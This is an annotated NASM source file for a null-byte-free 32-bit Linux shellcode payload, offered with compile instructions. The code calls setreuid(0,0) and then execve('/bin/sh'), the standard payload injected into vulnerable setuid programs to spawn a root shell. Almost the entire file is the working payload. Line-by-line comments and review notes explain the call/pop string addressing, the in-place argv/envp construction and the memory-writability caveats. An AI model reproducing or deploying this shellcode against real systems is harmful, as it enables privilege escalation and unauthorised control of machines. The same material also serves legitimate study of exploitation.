compile with: nasm -f elf shellcode.asm, then ld shell.o and ./a.out ;-)
--------------------------------------------------------BEGIN---------------------------------------------------
; 68 bytes shellcode (size as stated by the author; not re-measured here)
; no use of null byte in the encoding: registers are zeroed with xor and
; syscall numbers are loaded into al, and the NUL that terminates
; '/bin/sh' is written at run time rather than assembled.
; The address of the '/bin/sh' string is obtained with the call/pop
; sequence below (call pushes the address of the bytes that follow it).
; Compile with: nasm -f elf shellcode.asm, then ld shell.o and ./a.out ;-)
;
; Target:  32-bit Linux, syscalls via int 0x80
;          (eax = syscall number, args in ebx, ecx, edx).
; Flow:    setreuid(0, 0)        -- syscall 70
;          execve("/bin/sh", argv, envp) -- syscall 11, where argv and
;          envp are built in place right after the trailing '/bin/sh'.
; NOTE(review): there is no `section .text` directive, so _start and all
;          code below are assembled into .data. The in-place stores at
;          one: need that memory to be writable, and running from it
;          needs it to be executable; whether a given toolchain/kernel
;          (NX) permits that is outside this file -- confirm before
;          relying on it.
section .data
db '/bin/sh'                            ; unreferenced: no label, nothing
                                        ; below addresses it; the copy
                                        ; after `call one` is the one used
global _start
_start:
; setreuid(uid_t ruid, uid_t euid)  -- i386 syscall 70
xor eax, eax                            ; eax = 0
mov al, 70                              ; eax = 70 (setreuid), 8-bit move avoids 0x00 bytes
xor ebx, ebx                            ; ebx = ruid = 0
xor ecx, ecx                            ; ecx = euid = 0
int 0x80                                ; return value in eax is not checked
jmp two                                 ; go to the call that pushes the string address
one:
pop ebx                                 ; ebx = return address pushed by `call one`
                                        ;     = address of the '/bin/sh' bytes after it
; execve(const char *filename, char *const argv[], char *const envp[])  -- i386 syscall 11
; Layout built at ebx (the 7 assembled bytes '/bin/sh' plus 9 bytes written here):
;   +0..+6  '/bin/sh'      (assembled)
;   +7      0x00           NUL terminator, written below
;   +8      ebx            argv[0] = pointer to the string
;   +12     0              argv[1] = NULL; the same dword is envp[0] = NULL
; NOTE(review): offsets +7..+15 lie past the 7 bytes this file assembles,
;   so the stores overwrite whatever the linker places after the string;
;   that tail must be writable and unused.
xor eax, eax                            ; eax = 0
mov [ebx+7], al                         ; NUL-terminate "/bin/sh" (byte 7)
mov [ebx+8], ebx                        ; argv[0] = &"/bin/sh"
mov [ebx+12], eax                       ; argv[1] = NULL (also envp[0])
mov al, 11                              ; eax = 11 (execve); upper bytes still zero from xor
lea ecx, [ebx+8]                        ; ecx = argv  = ebx + 8  (lea does not touch flags)
lea edx, [ebx+12]                       ; edx = envp  = ebx + 12 (points at the NULL dword)
int 0x80                                ; does not return on success; no error check --
                                        ; on failure execution falls through into two:
                                        ; and repeats the call/pop sequence
two:
call one                                ; pushes the address of the bytes below, jumps to one:
db '/bin/sh'                            ; 7 bytes, no terminator; NUL and argv/envp
                                        ; are written after it at run time (see one:)
--------------------------------------------------------END-----------------------------------------------------